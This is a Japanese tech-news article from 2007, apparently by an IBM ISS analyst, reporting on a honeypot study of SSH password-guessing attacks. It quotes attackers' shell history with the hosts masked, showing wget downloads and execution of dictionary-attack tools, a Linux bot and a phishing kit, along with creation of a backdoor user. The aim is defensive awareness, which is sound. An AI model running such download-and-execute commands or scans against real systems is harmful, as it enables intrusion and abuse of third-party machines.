nikkei BPnet :: 日経BPのビジネス情報ポータル nikkei TRENDYnet :: トレンドウォッチ ポータル NBonline(日経ビジネスオンライン) :: ビジネスリーダーの羅針盤 PConline(日経パソコン オンライン) :: 仕事に役立つパソコン総合情報 ITpro :: ITプロフェッショナルのための専門情報 Tech-On! :: 技術者を応援する総合情報サイト 日経メディカル オンライン :: 臨床医のための情報サイト KEN-Platz(ケンプラッツ) :: 建設・不動産の総合情報サイト SAFETY JAPAN :: 安全な生活・セキュリティの総合サイト 経営とIT新潮流&EnterprisePlatform :: イノベータのための深掘り情報 BPtv :: 日経BPの動画ポータルサイト 日経キャリアNET :: 質の高い転職・求人情報
ITpro

ITpro Top エンタープライズ Development セキュリティ ネットワーク ITトレンド サイトマップ
マネジメント 情報システム データベース ミドルウェア Windows オープンソース/Linux サーバー&ストレージ
security
今週のトピックス
ITproからのお知らせ


今週のSecurity CheckITPro
ITproB はてなAB お気に入りへ 印刷 ヘルプ

はてなアンテナ はてなブックマーク

本当に怖い「パスワード破り」

記事一覧へ

〜ハニーポットによる調査結果から〜


1 2
 >> 


 パスワードを破ってFTPサーバーやSSHサーバーに不正侵入しようとする攻撃が後を絶たない。IBM ISSのセキュリティオペレーションセンター(SOC)でも多数検知している。本稿ではパスワード解析の脅威を再認識していただくために,ハニーポット[注1]を使った調査結果を基に,その実際の手口を解説したい。

注1 ハニーポットとは,攻撃者やワームなどをおびき寄せ,侵入後にどんな行動をとるかを監視・観察するためのシステムのこと(用語解説)。今回使用したハニーポット環境では,侵入した攻撃者が悪用できないようにアクセス制限を施し,外部への不正なパケットを制御した。

侵入後の振る舞い

 ハニーポットによる調査期間は2006年9月1日から9月25日。以下では,実際にパスワードを破られて侵入された事例を紹介する。

 システム・ログを確認したところ,この事例では,SSHサービスに対する認証が特定のIPアドレスから370回ほど連続しておこなわれ,最終的に侵入を許した。侵入後の攻撃者の行動は,historyコマンド[注2]によって確認できた(リスト1)。

注2 UNIX系OSのコマンドの一つ。コマンドの実行履歴などを表示する。

04  screen
05  w
06  cat /proc/cpuinfo 
07  /usr/sbin/useradd test
08  passwd test
09  cd /var/tmp
10  wget www.XXXX.XXXX.ro/XXXXcod.tar.gz ; tar zxvf XXXXcod.tar.gz ; cd XXXXcod ; chmod +x *
(パスワード解析ツールをダウンロードしている様子)
11  /unix 205.XXXX;./unix 208.XXXX;./unix 128.XXXX;./unix 137.XXXX 
(複数のネットワークに対してパスワード解析を実行している様子)

リスト1 historyの出力結果の一部(その1)(リスト中の「XXX」はいずれも伏字)

 出力結果を見ると,攻撃者は侵入に成功したシステム(ハニーポット)を,別のシステムに対するパスワード解析攻撃の踏み台にしていることが分かる。攻撃者はwgetコマンドを使って,無料のホスティング・サービスからパスワード解析ツールをダウンロードし(リスト1 10行目),複数のクラスBのアドレス・レンジに対してパスワード解析を仕掛けている(同11行目)。

 後日調査したところ,このとき使用されたツールは「辞書攻撃」をおこなうものであることが確認できた。辞書攻撃とは,パスワードとして使われることが多い単語を収めた“辞書”を使ってパスワードを破る攻撃手法のこと。このツールが使っていた辞書には1万3562件の単語が登録されていた。

 侵入されたシステムは,別のシステムへの侵入に悪用されるだけではない。侵入に成功した別の攻撃者は,ハニーポットにボットを仕掛けようとした(リスト2 132行目,138行目)。

132  wget XXXX.XXXX.uk/XXXX.tgz(ボット関連の圧縮ファイル)
133  tar xzvf XXXX.tgz
134  cd ..
135  ls
136  cd linuxbot/
137  ls
138  ./crond

リスト2 historyの出力結果の一部(その2)(リスト中の「XXX」はいずれも伏字)

 さらにその後,このシステム上に,フィッシング詐欺を目的とした偽のWebサイトを構築しようとしている(リスト3 144行目)

140  w
141  uname -a
142  cd /var/www/html
143  ls
144  wget XXXX.XXXX.com/XXXX.tgz(フィッシング・サイトの構築ツール)
145  tar xvfz XXXX.tgz
146  cd ..
147  ls
148  cd html
149  ls
150  chmod +x XXXX
151  cd XXXX
152  chmod +x *
153  ls

リスト3 historyの出力結果の一部(その3)(リスト中の「XXX」はいずれも伏字)

 この事例に見られるように,一度侵入されると,そのシステムは攻撃者に“思う存分”悪用されることになる。不正侵入を許すことは,攻撃者に加担することになるのだ。システムに重要な情報が保存されていないからといって,油断してはいけないことが分かっていただけるだろう。

 余談ではあるが,今回の調査では,攻撃者は14のサイトから解析ツールなどをダウンロードしていた。これらのサイトを調べたところ,8サイトが無料で利用できるホスティング・サービスのサイトだった。無料のホスティング・サービスは,住所や氏名,年齢などを入力すれば誰でも利用できる。しかも,偽りのデータを入力しても確認されないので,事実上匿名で利用可能だ。そのため,ツールの置き場所として攻撃者に悪用されることが多い。

 この記事は,2006年11月13日に公開した「今週のSecurity Check」を再構成したものです。

次ページ  rootアカウントが狙われる  

1 2
 >>     記事一覧へ>>   


 [2007/12/10]




ITproB 会員登録
コメントを書く お気に入りへ
コメントを読む 印刷
はてなAB ヘルプ
はてなアンテナ はてなブックマーク

関連製品・サービス

運用管理統合運用管理
インフォリスクマネージ 『Utilityz』:マネージドホスティングサービス
運用管理統合運用管理
富士通 事例で解説,継続的な情報収集でトラブルを未然防止
運用管理各種システム運用管理
デル よりシンプルになるシステム管理やストレージ構築
セキュリティUTM製品(統合脅威管理)
アズジェント UTM-1
セキュリティUTM製品(統合脅威管理)
アズジェント VPN-1 UTM Edge
セキュリティUTM製品(統合脅威管理)
シマンテック 多様な脅威に包括的に対応するメールセキュリティ アプライアンス
セキュリティデータベース・セキュリティ
アクアシステムズ Audit Master
セキュリティスパム・メール対策
トレンドマイクロ InterScan Messaging Security Appliance
SIサービス各種セキュリティ系ソリューション
シマンテック 企業が抱える「ITリスク」を的確に診断
SIサービス各種セキュリティ系ソリューション
トレンドマイクロ 「Webからの脅威」に対抗するためのセキュリティ緊急講座
SIサービス各種アウトソーシング/ASP
アクセンチュア グローバル・ソーシング待望論 〜世界を飲み込む『最適化』の波
SIサービス各種アウトソーシング/ASP
富士通 ITインフラ管理の舞台裏・徹底レポート
通信サービス各種WAN系
広告企画 VPNソリューションセミナー 2007 Review
通信サービス各種アクセス系
KDDI IPコミュニケーション&モバイル2007 KDDI特別講演レポート
通信サービス各種アクセス系
広告企画 NGN Summitレビュー 〜最新動向を専門的な立場から解説

セキュリティのTopics
ページトップ



ニュース
「1週間で100万円の収入!」,今でも出回る「ねずみ講メール」
Webアプリ・フレームワークRuby on Railsの最新版「2.0.1」がリリース
「Vista SP1は互換性に最大限の配慮」,マイクロソフトが企業向けの利点を説明
日本ルシーダがクライアントPCのセキュリティを管理するアプライアンス新版を出荷
マイクロソフト,VistaとOffice 2007のSP1詳細を説明


セキュリティのTopics



PICK UPコンテンツ
日経BP社 IT専門誌
 
おススメ最新記事
NEW! 達人に学ぶ デモンストレーション術(日経SYSTEMS)
システムダウン そのときどうする?(日経SYSTEMS)
ホーム・ネットワーク強化大作戦(日経NETWORK)
ネット設定&ログ 徹底活用法(日経NETWORK)
意図が伝わる設計書の作り方(日経SYSTEMS)
 
書籍・セミナーのお知らせ
予約受付中◆「こんなSEはいらない!」
ホーム・ネットワークの基本からセキュリティ対策まで
>>More
ITpro協力誌一覧
RSSフィード
RSSフィード


メニュー一覧
マネジメント  内部統制  CIO情報交差点  BCP(事業継続計画)  決算&業界動向
情報システム  業務アプリケーション  上流工程  SaaS&Enterprise 2.0  グローバル・ソーシング
データベース/ミドルウエア
Windows  Vista  サーバー  Enterprise Office
オープンソース/Linux  Linux  サーバー  デスクトップ  ビギナーズ
サーバー&ストレージ  システム運用管理  仮想化  グリーンIT
Development  Strategic Web Design(SWD)  SWD:マネジメント  SWD:テクノロジ  SWD:デザイン
セキュリティ  セキュリティ・ホール&ウイルス  CSIRTフォーラム  Webの脅威
ネットワーク  携帯&モバイル  IPコミュニケーション/IP電話  NGN  放送  技術
ITトレンド
ITpro協力誌  日経コンピュータ  日経コミュニケーション  日経SYSTEMS  日経情報ストラテジー  日経NETWORK  日経ソリューションビジネス  
日経ソフトウエア  日経Linux  日経ニューメディア  日経BPガバメントテクノロジー  日経パソコン  日経BPソフトプレス
ITpro SkillUP
ITpro SkillUP  必修講座100  ビジネスSkillUP  技術SkillUP  IT関連資格  eラーニング  キャリア  ヘルスケア  
ITpro Watcher
IT経営  システム開発  プロマネ&アーキテクト  ネットワーク
最新テクノロジー  業績&業界動向  セキュリティ  Windows  オープンソース
メニュー一覧
製品&サービス・ディレクトリ  業務アプリケーション  設計開発  OS/DB/ミドルウエア  サーバー/ストレージ  
  運用管理  ネットワーク  セキュリティ  SIサービス  通信サービス  クライアント/OA機器
製品&サービス・レビュー  事例データベース  調査  キーワード  辞書  イベント  検索
MyITpro
ITproB(オンライン・ブックマーク)  ITproフォーラム  履修管理  MyITproとは


ITproについて会員登録・メールマガジン購読ITproプレミアム(有料サービス)MyITproについてITpro Researchについて
ITproへのお問い合わせ・ご意見日経BP書店日経BPケータイメニュー広告について
著作権リンクについて|個人情報保護方針/ネットにおける情報収集についてサイトマップ
プライバシーマーク

日経BP社Copyright (C) 1995-2007 Nikkei Business Publications, Inc. All rights reserved.
このページに掲載されている記事・写真・図表などの無断転載を禁じます。著作権は日経BP社,またはその情報提供者に帰属します。
掲載している情報は,記事執筆時点のものです。